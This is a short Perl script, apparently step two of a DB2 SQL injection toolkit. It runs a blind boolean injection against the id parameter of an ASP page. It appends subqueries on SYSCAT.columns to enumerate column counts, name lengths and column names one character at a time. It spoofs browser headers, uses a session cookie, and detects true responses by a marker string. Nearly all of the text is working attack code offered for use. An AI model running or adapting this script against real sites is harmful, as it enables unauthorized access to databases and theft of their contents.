#!/usr/bin/perl
#################
#step2.pl
#demo for DB2 inj
#################

use LWP::UserAgent;

$path = "http://www.site.com/visit/index.asp?id=6503";
$string= "superhei";
$ARGC = @ARGV;
$tabname= @ARGV[0];

#@ta=('AA_ASET_AVEPRICE','AA_HR_ABR_POLITICS_AUDI_EMP','AA_HR_ABR_POLITICS_AUDI_INFO','AA_JJJ','AA_JJJ_I','AA_JJJ_O');
for($i=1;$i<20;$i++){
$que = $path." and (select max(COLNo) from SYSCAT.columns where tabname='".$tabname."')=".$i;
if ( &check($que) ){
print "colno:".$i;
$len = $i;
last;
   }
} 

for($iii=0;$iii<$len;$iii++){
  for($j=1;$j<10;$j++){
$que = $path." and length((select COLNAME from SYSCAT.columns where tabname='".$tabname."' and colno=".$iii."))=".$j;
if ( &check($que) ){
sleep(1);

$xxx=$j+1;
print "第".$iii."个列长度".$j."\n";
last;
}
}

$tablex='';

for($jj=1;$jj<$xxx;$jj++){
for ($ii=65;$ii<97;$ii++){

$que = $path." AND ASCII((SELECT (SUBSTR(COLNAME,".$jj.",1)) from SYSCAT.columns where tabname='".$tabname."' and colno=".$iii."))=".$ii;

if ( &check($que) ){
sleep(1);
print chr($ii);
$tablex=$tablex.chr($ii);
last;}
}
} 
print "\n第".$iii."个列名为".$tablex."\n";
}

sub check($)
 {
 my @ns_headers = (
   'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
   'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*',
   'Accept-Language' => 'zh-cn',
   'Host' =>'www.site.com',
   'Connection' =>'Keep-Alive',
'Cookie'=>'ASPSESSIONIDSAAQTTBR=OEHKJJOBBKAADNNPLKFCNEAL'
  );
$http_query = $_[0];
 print "\r\n $http_query \r\n";
 $mcb_reguest = LWP::UserAgent->new() or die;
 $res = $mcb_reguest->get($http_query, @ns_headers); 
 @results = $res->content; 
sleep(1);
@num=grep /$string/, @results; 
#print @results;
$size=@num; 
if ($size > 0) { return 1; }
 return 0;
 }